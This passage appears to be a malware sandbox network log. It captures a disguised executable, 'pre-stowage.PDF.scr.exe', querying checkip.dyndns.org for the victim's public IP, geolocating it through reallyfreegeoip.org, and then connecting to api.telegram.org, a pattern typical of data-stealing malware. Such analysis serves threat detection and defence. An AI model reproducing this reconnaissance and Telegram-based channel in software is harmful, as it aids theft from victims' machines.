                                                                                                      Dec 17, 2024 08:34:06.675714970 CET49723443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:06.687594891 CET49723443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:06.710133076 CET4972180192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:06.714006901 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:06.830214024 CET8049721193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:06.830363035 CET4972180192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:06.833838940 CET8049724193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:06.833935022 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:06.834176064 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:06.953874111 CET8049724193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:07.940956116 CET8049724193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:07.942394018 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:07.942430019 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:07.942789078 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:07.943073988 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:07.943088055 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:07.990890026 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.162898064 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.209688902 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:09.236218929 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:09.236243010 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.608807087 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.608886957 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.609008074 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:09.614089012 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:09.698112011 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.699074030 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.818373919 CET8049724193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.818466902 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.818766117 CET8049728193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.818861961 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.819014072 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.939224005 CET8049728193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:10.930502892 CET8049728193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:10.932024956 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:10.932061911 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:10.932296038 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:10.932542086 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:10.932555914 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:10.975300074 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.142385960 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.189851046 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:12.189892054 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.587234020 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.587291956 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.587359905 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:12.587971926 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:12.592638969 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.601248980 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.712620974 CET8049728193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.712697983 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.720993996 CET8049730193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.721087933 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.721280098 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.840940952 CET8049730193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:14.484555960 CET8049730193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:14.486093044 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:14.486161947 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:14.486260891 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:14.486566067 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:14.486603022 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:14.537786007 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:15.723970890 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:15.731899977 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:15.731930971 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.211242914 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.211321115 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.211410999 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:16.212304115 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:16.227505922 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:16.449120998 CET8049730193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.449238062 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:16.451575041 CET49732443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.451603889 CET44349732149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.451683998 CET49732443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.452210903 CET49732443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.452235937 CET44349732149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.696333885 CET44349732149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.714663982 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.714709044 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.714966059 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.715095043 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.715122938 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.097436905 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.097507000 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:18.153104067 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:18.153122902 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.153523922 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.155261040 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:18.199323893 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.608243942 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.608341932 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.608396053 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:18.611958027 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:23.859396935 CET4971580192.168.2.7193.122.130.0
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 08:33:48.504843950 CET | 51811 | 53 | 192.168.2.7 | 1.1.1.1
Dec 17, 2024 08:33:48.642072916 CET | 53 | 51811 | 1.1.1.1 | 192.168.2.7
Dec 17, 2024 08:33:50.825853109 CET | 60258 | 53 | 192.168.2.7 | 1.1.1.1
Dec 17, 2024 08:33:50.967335939 CET | 53 | 60258 | 1.1.1.1 | 192.168.2.7
Dec 17, 2024 08:34:16.228213072 CET | 64878 | 53 | 192.168.2.7 | 1.1.1.1
Dec 17, 2024 08:34:16.450675964 CET | 53 | 64878 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 08:33:48.504843950 CET | 192.168.2.7 | 1.1.1.1 | 0x9a85 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 17, 2024 08:33:50.825853109 CET | 192.168.2.7 | 1.1.1.1 | 0x155f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Dec 17, 2024 08:34:16.228213072 CET | 192.168.2.7 | 1.1.1.1 | 0xf0a0 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 08:33:48.642072916 CET | 1.1.1.1 | 192.168.2.7 | 0x9a85 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 17, 2024 08:33:48.642072916 CET | 1.1.1.1 | 192.168.2.7 | 0x9a85 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 08:33:48.642072916 CET | 1.1.1.1 | 192.168.2.7 | 0x9a85 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 08:33:48.642072916 CET | 1.1.1.1 | 192.168.2.7 | 0x9a85 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 08:33:48.642072916 CET | 1.1.1.1 | 192.168.2.7 | 0x9a85 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 08:33:48.642072916 CET | 1.1.1.1 | 192.168.2.7 | 0x9a85 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 08:33:50.967335939 CET | 1.1.1.1 | 192.168.2.7 | 0x155f | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 08:33:50.967335939 CET | 1.1.1.1 | 192.168.2.7 | 0x155f | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 08:34:16.450675964 CET | 1.1.1.1 | 192.168.2.7 | 0xf0a0 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 193.122.130.0 | 80 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data

Dec 17, 2024 08:33:48.776305914 CET | 151 | OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Dec 17, 2024 08:33:49.875155926 CET | 321 | IN
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 07:33:49 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 0d9e0d51bdd34faf5fbeb6403edae87e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Dec 17, 2024 08:33:49.911330938 CET | 127 | OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Dec 17, 2024 08:33:50.231628895 CET | 321 | IN
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 07:33:50 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 12db5aa233b5c3825b27de1f05058ff7
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Dec 17, 2024 08:33:52.677329063 CET | 127 | OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Dec 17, 2024 08:33:53.016958952 CET | 321 | IN
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 07:33:52 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b83a04db60dcf62945f993731fc67da8
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49713 | 193.122.130.0 | 80 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data

Dec 17, 2024 08:33:54.806826115 CET | 127 | OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Dec 17, 2024 08:33:55.926506996 CET | 321 | IN
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 07:33:55 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: cf20e80660a19831c28a6ada27d56c02
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49715 | 193.122.130.0 | 80 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 08:33:57.709274054 CET | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Dec 17, 2024 08:33:58.806240082 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 07:33:58 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 943b6d5abeb7b0e3bac14784676b4285
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49717 | 193.122.130.0 | 80 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 08:34:00.599440098 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 17, 2024 08:34:01.695772886 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 07:34:01 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: a4ecc9a7ee72da32783e2eb5eb5b8641
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49721 | 193.122.130.0 | 80 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 08:34:03.544388056 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 17, 2024 08:34:04.640063047 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 07:34:04 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 14164a9bdef25867a74bab2a46e0c4d6
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49724 | 193.122.130.0 | 80 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 08:34:06.834176064 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 17, 2024 08:34:07.940956116 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 07:34:07 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: ee135d544361108300fd408619cf403f
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49728 | 193.122.130.0 | 80 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 08:34:09.819014072 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 17, 2024 08:34:10.930502892 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 07:34:10 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 7c9b0e162b7fd42f6a6ed7fbedd2b026
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49730 | 193.122.130.0 | 80 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 08:34:12.721280098 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Dec 17, 2024 08:34:14.484555960 CET | 321 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 07:34:14 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 13171041f93da1874c10c3ec39cabcc3
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49703 | 172.67.177.134 | 443 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:33:52 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-17 07:33:52 UTC | 874 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 07:33:52 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 409601
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iYCr01qAqUqRZn2NOkkHeTy0SfOrD5Aml7BoNdGwgl6w5jh89j8pbl4rmM4OOU%2B7VswXvdAYSOsxcSbQ5qfpONFYMQ5qcX2pJXXf7pa63wTU5Iaj7qC%2F7gXY4DrIK6iIazrVMp0p"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f353a3b18a88cc0-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2049&min_rtt=2048&rtt_var=770&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1420233&cwnd=219&unsent_bytes=0&cid=14452bba45d7b752&ts=478&x=0"
2024-12-17 07:33:52 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49706 | 172.67.177.134 | 443 | 6896 | C:\Users\user\Desktop\pre-stowage.PDF.scr.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-17 07:33:54 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-17 07:33:54 UTC | 886 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 07:33:54 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 409603
    Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Eye9L%2FQCcS%2FAQpGWcIv05f%2FEblpBSQZzfi4o3mymB65Q9H67cpXJ%2BQuLGZlB4ayCglRq2q2%2B7YNp%2FG%2BccNKwkK2co9EcC5iFnHvX1lWHLzijIfJLEAmhcO%2Fg5DkXSYtHF41lCEe"}],"group":"cf-nel","max_age":604800}
